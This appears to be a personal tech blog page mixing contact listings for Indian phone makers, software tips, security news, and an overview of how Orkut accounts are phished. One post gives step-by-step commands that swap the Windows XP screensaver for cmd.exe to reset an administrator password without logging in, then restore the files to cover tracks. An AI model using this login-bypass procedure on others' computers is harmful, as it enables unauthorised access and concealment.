  • Corporate Office: Millennium Plaza, Tower-A, Ground Floor, Sushant Lok, Sector-27, Gurgaon-122 002; Telephone: 0124-4525100, Fax: 124-4975918
  • Registered Office: B-86/1, Okhla Industrial Area, Phase-II, New Delhi-110020; Telephone: 011-41613145-46, Fax: 011-26385832
  • Toll Free: 1800-102-5888

icube Mobiles

  • Registered Office: Telelogix, No.127, 5th Cross, Cambridge Layout, Bangalore-560008
  • Telephone: 09686190029
  • Email: info@icubemobiles.com
  • Website: www.icubemobiles.com

Byond Mobiles

  • Website: www.byondtech.com
  • Corporate Office: 205, Ashoka Arch, Near Nisarg Mangal Karyalay, Market yard, Pune-411037
  • Telephone: (020)41029633, 41029634, Fax: 020-41029629
  • Customer Care: 09657703562
  • E-Mail: enquiry@byondtech.com

i5 Mobiles

  • Address: Current Systems, 1/948, Bhimkachhi Street, Near Central Bank of India, Nanpura, Surat-395001
  • Fax: 0261-24633998, Extension: 24
  • Phone: 0261-2463998 Extension: 9
  • Help line: 09275107555
  • E-mail: current_s@yahoo.com, support@i5india.com
  • Website: www.i5india.com

Airnet Mobiles

  • Website: www.airnetindia.in
  • Email: Info@airnetindia.in
  • Address: VEE ESS Sales Private Limited, C-128, Mayapuri Ind Area, Phase-II, New Delhi-110064
  • Phone: (011)41845086, 30125086
  • Mobile: 09911868634

Quba Mobiles

  • Website: www.tekshivmobile.com, www.tekshiv.in
  • E-Mail: info@tekshivmobile.com
  • Address: Tekshiv Systems Private Limited, 1-11, DLF Industrial Area, Phase-1, Faridabad (Haryana)
  • Phone: 0129-4089600
  • Mobile: 09911085587
  • Fax: 0129-4083811

Lemon Mobiles

  • Website: www.lemonmobiles.com
  • E-Mail: sales@lemonmobiles.com
  • Address: Fastrack Communications Private Limited, B-123, Sector-2, Noida-201305
  • Phone: (0120)4512100, 4512199
  • Fax: 012-4512147
  • Mobile: 09810605114

Accord Mobiles

  • Website: www.accordmobiles.com
  • E-Mail: info@accordmobiles.com
  • Address: Accord communications limited, 3-4, Mohkampur Industrial Area-1, Meerut-250002
  • Phone: (0121)3266477, 3267140
  • Fax: 0121-2515125
  • SMS: AMB to 56767

Paxma Mobile

  • Website: www.paxma.in
  • Registered Office: HYM Impex Private Limited, Plot No. 42, F.I.E., Patparganj Industrial Area, Delhi-110092
  • Telephone: 011-45685335
  • Customer Care: 09999789992
  • Sales Enquiry: sales@paxma.in
  • General Enquiry: info@paxma.in

Orpat Mobiles

  • Website: www.orpatgroup.com
  • Address: Ajanta Limited, Orpat Industrial Estate, Rajkot Highway, Morbi-363641
  • Phone: (02822)391111, 391100, 231444, 231445, 231446
  • Fax: (02822)230125, 230599
  • E-mail: info@orpatgroup.com

Spice Mobile

  • Website: www.spicemobile.in
  • E-Mail: customercare@spicemobile.in
  • Address: D-1, Sector-3, Noida-201 301, Uttar Pradesh, India.
  • Telephone: (0120)4363600, 4363800
  • Fax: 0120-4363845
  • Toll Free: 1800 300 77423
  • SMS: SPICE SERVICE to 56300

Gee Pee Mobiles

  • Website: www.geepee.biz
  • Address: Gee Pee Infotech Private Limited (Mobile Division), 34/1Q, Ballygunge Circular Road, Kolkata-700019
  • Phone: (033) 2476 0931, 4022 9000
  • Fax: 033 2475 5324
  • E-Mail: enquiry@geepee.biz

Micromax Mobiles

  • Website: www.micromaxinfo.com
  • Corporate Office: Micromax House, 697, Udyog Vihar, Phase-V, Gurgaon, Haryana
  • Phone: (0124)4009601, 4009602
  • Fax: 0124-4009603

Intex Mobiles

  • Website: www.intextechnologies.com
  • Address: Intex Technologies (India) Limited, D-18/2, Okhla Industrial Area, Phase – II, New Delhi-110020
  • Telephone: (011) 30888906, 41610224, 4161025, 4161026
  • Fax: (011) 41610221, 41610190
  • Toll Free: 1800 103 8822
  • General Enquiry: info@intextechnologies.com
  • Service Enquiry: intexcare@intextechnologies.com

Usha Lexus Mobiles

  • Website: www.lexusmobiles.com
  • Address: USHA LEXUS ELECTRONICS, (Prop. General Sales Limited), 897, Phase-I, Udyog Vihar, Gurgaon-122016
  • Telephone: 0124-4763600
  • Fax: (0124)4763650, 4763660
  • E-Mail: info@lexusmobiles.com

Onida Mobiles

  • Website: www.onida.com
  • Contact Number: (022)28200435, 66975777

Olive Mobiles

  • Website: www.olivetelecom.in
  • Address: Olive Telecom, 862 Udyog Vihar, Phase 5, Gurgaon-122016
  • Phone: 0124 4648000‎

Ajanta Mobiles

  • Website: www.ajantamobile.com
  • Address: AJANTA INDIA LIMITED, AJANTA INDUSTRIAL ESTATE, OPP. REWA PARK, MORBI-RAJKOT HIGHWAY, MORBI-363641
  • Phone: (02822)226200, 227200
  • Fax: 02822-234000
  • Toll Free: 1800 233 8100
  • E-Mail: ajantacare@ajantamobile.com

Acer Mobiles

  • Website: www.acer.co.in
  • E-Mail: ail_easycare@acer.co.in
  • Address: Acer India (Pvt) Ltd., “Embassy Heights”, 6th Floor, No.13, Magrath Road, (Next to Hosmat Hospital), Bangalore-560025
  • Telephone: (080)25329520, 25329521, 25329523
  • Fax: 080-25329535

Pine Mobiles

  • Website: www.pinemobiles.com
  • Address: Pine Mobiles Pvt. Ltd., 175, Patparganj Industrial Area, New Delhi-110092
  • Phone: 011 45874237
  • Fax: 011 45874237
  • E-Mail: info@pinemobiles.com

Pagaria Mobiles

  • Website: www.pagmobiles.in
  • Address: EPIC SOFTWARE PVT. LTD., 2155, IInd Floor Outram Lane, Kingsway Camp, NEW DELHI-110009
  • Phone: 011 27601292
  • Mobile: 09999726725
  • E-Mail: info@pagmobiles.in

Longtel Mobiles

  • Website: www.longtelmobile.in
  • Address: Longtel Technology Pvt. Ltd, 2162-64, 2174-75, 2nd Floor, Lane No.61, Naiwala, Gurudwara Road, Karol Bagh, New Delhi-110005
  • Telephone: (011)45131075, 45625752
  • Fax: 011 45131075
  • E-Mail: sales@longtel.in

Fujezone Mobiles

  • Website: www.fujezonemobiles.com
  • Corporate Office: Plot 284, Lane 3, Sultan Sadan 2, Westend Marg, Saidulajab, New Delhi-110030
  • Telephone: 011-29536163
  • Fax: 011-29531698

Fly Mobiles

  • Website: www.flyphone.in
  • Address: A24/5, Mohan Co-operative Industrial Estate, Mathura Road, Delhi-110044
  • Telephone: (0120) 6667770, 4526940

Karbonn Mobiles

  • Website: www.karbonnmobiles.com
  • Address: Karbonn, #39/13, off 7th main, HAL 2nd stage, Appareddy Playa, Indiranagar, Bangalore-560038
  • Phone: 080 41378858

Rage Mobiles

  • Corporate Office: Sunstrike Telecom Pvt. Ltd, F-11, Udyog Nagar Industrial Area, New Rohtak Road, Peera Garhi, New Delhi-110041
  • Telefax: 0-11-45576771
  • Website: www.rage-mobile.com
  • Toll Free: 1800-103-2565
  • SMS: RAGE to 54545

Murphy Mobiles

  • Corporate Office: Amber Infosolutions Pvt. Ltd., B-88, Sector 64, Noida, Uttar Pradesh, India, PIN: 201301
  • Phone: 0120 4313557
  • Website: www.murphymobiles.com
  • E-Mail: info@murphymobiles.com

e Touch Mobiles

  • Address: 316-320, B wing, Bhaveshwar Arcade, LBS Road, Opp. Shreyas Theatre, Ghatkopar (West), Mumbai-400086
  • Telephone: 022-4205 6000
  • FAX: 022-4205 6030
  • Website: www.etouchmobile.net
  • E-Mail: sneha@etouchmobile.net
  • Customer Care: 022-25002446
Share:

Google Script Converter – Read Webpages in Your Language Script

Script Converter is a Google Labs product that allows the user to read a web page in a script of their choice. For example, if the user can understand spoken Malayalam, but cannot read the script, they will be able to view Malayalam web pages in English (Roman) script.
This application does not translate any content, instead it just transform the words on the page to its phonetic equivalent in the desired script.
The application also support the conversion from non-Unicode encoding to Unicode, so that users can view pages without installing the custom font otherwise needed. Users will still need Unicode fonts.
Try it out yourself. To start browsing a website, visit the Script Converter website, type the url in the text area, choose your preferred script and press convert.
The web app currently supports 17 languages including Malayalam, Sanskrit, Tamil, Kannada, Telugu, English, Bengali, Gujarati, Hindi, Marathi, Nepali, Punjabi and Urdu.
The application supports a variety of fonts used in several popular sites. If the conversion for your favorite site is not working, you may please send an email to indialabs+scriptconv@google.com for support.
Every link you click on a converted page will itself be converted to your script, which makes browing through the converted website easier. This will allow you to seamlessly continue your browsing session in the script of your choice.
And if you just want to convert some text only you can paste your text in the text area of the converter website and get it converted in to your choice of language.
Share:

Wednesday, August 18, 2010

Assemble Desktop Computers. and Laptops - Software Helps

How To Assemble Desktop PC and laptopFor those who want to learn how to assemble pc or laptop, the tool could be helpful.This software, Virtual Learning Tools have been developed to supplement PC Hardware and Software classroom instruction and provide opportunities for interactive learning. The software contains Virtual Desktop and Virtual Laptop, support course delivery in environments with limited physical equipment by enabling students to virtually disassemble and reassemble any pc and laptops.

Virtual Learning Tools explain instructions that will help you assemble a basic computer capable of running most latest software packages encountered by a casual user.
Share:

Connect 2 computers via USB cable

usb cable netlinkThe following is a simple way to connect 2 computers using USB cable , The USB 2.0 Netlink Cable allows you to connect two computers via USB ports that forming a network between computers so that the network can exchange data or sharing an Internet connection-sharing or other devices, such as printers, scanners, etc.. With the transfer speed of 480MB / s.

Besides can connect between two computers, with USB HUB, the USB 2.0 Netlink Cable can establish a network between multiple computers (as shown by image below)

usb netlink connect 2 computers
With a network using an USB HUB scheme as above, all computers be connected, so it can communicate with each other. Can sharing each other peripherals. Suitable also for multi-player games. In conclusion it can be a substitute for the function of Network Card/ Network Adapter .

Specification:
  • Full Compliant with USB 2.0, up to 480Mbps data transfer rate.
  • Compatible with USB 1.1
  • Networking Link & Data Transfer via USB Interface
  • Sharing Network such as ADSL, Modem, CD-ROM, Printer, Scanner, etc.
  • Including function of LAN card, support NETBEUI , TCP/IP
  • Can Network link more over 20 PCs (with USB HUB)
  • Price : approximately $.20 (Rp.180.000 - IDR)
Share:

SLP KaraoBird, Let's sing and karaoke on youtube - Firefox add-on

SLP KaraoBird For Youtube firefox addons
Want to karaoke on Youtube with lyrics of the song? Just use this firefox extension SLP KaraoBird. Widely available on YouTube video music clips from various singers. In fact, the Google owned video sharing site that has made a special page on YouTube Music .

But, not all of the clips showing the lyrics of the song is displayed. Yet sometimes when watching the music clips, there is a desire to sing along..

Now, the desire for a karaoke that can easily be realized through a Firefox extension. The Youtube karaoke extension in Firefox was named Scrolling Lyrics Player (SLP). But may also be referred to as KaraoBird accordance with the engine that used on the back.

The following are installation steps of the SLP KaraoBird:

1. Visit rge SLP Add-On page here :KaraoBird For Youtube
2. Click, "Add To Firefox"
3. In the window that appears click "Install"
4. Firefox will ask to Restart to enable the SLP

How to use the SLP:

1. Visit YouTube.com/Music
2. Find a music video that wants to sing
3. Automatically on the video page will appear a box containing the lyrics
4. Adjust the offset (plus or minus) at the beginning of the song by scrolling the mouse over the box lyrics
5. Sing as we pleased.
Share:

Microsoft Patches Critical Crack Released

windows security patchYesterday, August-03-2010, Microsoft released an emergency patch for a "critical" crack in Windows OS, The patch that could let crackers or hackers take control of computers over the Internet.

Microsoft official said, "The vulnerability could allow remote code execution if the icon of a specially crafted shortcut is displayed"

"An attacker who successfully exploited this vulnerability could gain the same user rights as the local user."

Computer users commonly use shortcuts in the form of on-screen icons they can click to instantly awaken favoured applications.

The Windows flaw lets hackers booby-trap such icons with malicious software that could let them control machines from afar.

Microsoft routinely releases software patches the second Tuesday of each month, but resorts to making patches available "out of band" when it deems situations dangerous.

"Several families of malware have been attempting to attack this vulnerability," Microsoft Trustworthy Computing response manager Christopher Budd wrote in a blog post.

"We firmly believe that releasing the update out of band is the best thing to do to help protect our customers."

Some attacks have reportedly been directed at power plants and other vital infrastructure. People using computers running on any version of Windows software were urged to apply the update immediately.

To run the microsoft update, use this site, you must be running Microsoft Internet Explorer 5 or later.

To upgrade to the latest version of the browser, go to the Internet Explorer Downloads website.

If you prefer to use a different web browser, you can obtain updates from the Microsoft Download Center or you can stay up to date with the latest critical and security updates by using Automatic Updates. To turn on Automatic Updates:

1. Click Start, and then click Control Panel.
2. Depending on which Control Panel view you use, Classic or Category, do one of the following:
* Click System, and then click the Automatic Updates tab.
* Click Performance and Maintenance, click System, and then click the Automatic Updates tab.
3. Click the option that you want. Make sure Automatic Updates is not turned off.
Share:

Tuesday, August 10, 2010

Trace A Mobile Phone In India

 Enter 10 Digit Mobile Phone Number :
Share:

Block or Disable Stolen or Lost Mobile(Cell) Phone Using IMEI Number

International Mobile Equipment Identity i.e  IMEI number popular known as Mobile phone’s serial number is a 15 digit code that will appear Disable Stolen or Lost Mobile(Cell) Phone Using IMEI Number on the mobile screen when you press * # 0 6 #  Copy the number down and keep it for future reference.
This number is unique to your handset and helps you disabling and blocking yours stolen or lost phone in future . Motoralla Users can also try press #,* to retrive IEMI Number of your Phones

How To Use IMEI Number to Block Phones

If your mobile phone is  lost or stolen  you can inform your network provider with yours IMEI number who can then put the serial number on a shared database. This list stops this particular phone from registering on any network and will be useless for anyone even if the mobile phone’s SIM card is changed!

Get Mobile Information Using IMEI Number

You can also get all yours mobile phone information using yours Mobile IMEI number all you need is to try the IMEI Number Analysis .
Share:

Recover All Windows Password including Vista with Login Recovery

Login Recovery is a Online service that can help you to recover your Windows Password including Windows Vista.
There are three steps Involved
  1. Download the Login Recovery Software extraction program to create a bootable floppy disk to read the password file.
    (click here for a CD version)
  2. Insert the disk into the computer you wish to recover passwords from and boot the computer to extract the encrypted passwords to the disk.
  3. Put the disk into an Internet enabled computer, and upload the encrypted password file for decryption. (see uploads page)
Share:

How to Hack or Crack a Windows XP Administrator Password

Windows XP Privilege Escalation Exploit

(Before you continue Read the Updates at the bottom)
Here are the steps involved to Hack the Window XP Administrator Password .
  1. Go to Start –> Run –> Type in CMD
  2. You will get a command prompt. Enter these commands the way it is given
  3. cd\
  4. cd\ windows\system32
  5. mkdir temphack
  6. copy logon.scr temphack\logon.scr
  7. copy cmd.exe temphack\cmd.exe
  8. del logon.scr
  9. rename cmd.exe logon.scr
  10. exit
Wait its not over read the rest to find out how to Hack the Window XP Administrator Password
A Brief explanation of what you are currently doing here is
Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is clazh and you want change the password to pass Then type in the following command
net user clazh pass
This will chang the admin password to pass.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.
Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.
  1. Go to Start –> Run –> Type in CMD
  2. You will get a command prompt. Enter these commands the way it is given
  3. cd\
  4. cd\ windows\system32\temphack
  5. copy logon.scr C:\windows\system32\logon.scr
  6. copy cmd.exe C:\windows\system32\cmd.exe
  7. exit
Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.
Via internetbusinessdaily.net
Note To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail.
Update: Christian Mohn points out The Above method is is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.
Update: The above Method only works if the system is FAT/FAT32 – because of the updated “user rights management” in NTFS – file level rights etc. This does not work on a system using NTFS.
Share:

5 Ways To Hack Orkut Profiles

                 Knowledge about on how Hackers Hack orkut profiles will help you to protect yours Orkut Profile from Being Hacked by Hackers,Below are 5 methods through which you can hack or protect yours orkut profile or any other social networking profile from being Hacked by Hackers :P
  • Phishing Attack is the most popular way of stealing other’s password. Popular by the name of fake login (among those who knows it!!) the users land on a page where they are asked for their login information and they enter their username and password thinking it to be a real page but actually it is other way round. It submits all the details entered to the programmer or the coder.
  • Community Links: Many times you are provided with a link to a community in a scrap. Read the link carefully, It may be something like http://www.okrut.com/Community.aspx?cmm=22910233 OKRUT not ORKUT. Clicking on this link will take you to a fake login page and there you loose up your password.Orkut Tools
  • Orkut New Features: I have come across a page that looks like they are giving the user a choice of selecting new features for orkut with your ID and password, of course!! When user submit the page, there goes his ID and password mailed to the coder.
  • Java script: You must have seen the circulating scraps that asks you to paste this code in your address bar and see what happens! Well sometimes they also leak out your information. Check the code and if you are unsure of what to do, then I recommend not to use it.
  • Primary mail address: If by some means a hacker came to know password of your Yahoo mail or Gmail, which users normally keeps as their primary mail address in their Orkut account, then hacker can hack Orkut account by simply using USER ID and clicking on ‘forget password’.This way Google will send link to the already hacked primary email id to change the password of the Orkut account. Hence the email hacker will change your Orkut account’s password. Hence your Orkut account hacked too.
Share:

என்னை பற்றி...

My photo
Am Working as Assistant Professor in the Department of Information Technology at Sri Sairam Institute of Technology, Chennai.

முக்கிய செய்திகள்...

நாள்காட்டி

வானிலை



IP and Flag Counter

Wikipedia

Search results

QR Code Generator

All Conversion Widget

Recent Posts

Blog Archive

Copyright © பொன். சுதாகர் | Powered by Blogger
Design by SimpleWpThemes | Blogger Theme by NewBloggerThemes.com & Distributed By Bloggertemplates4u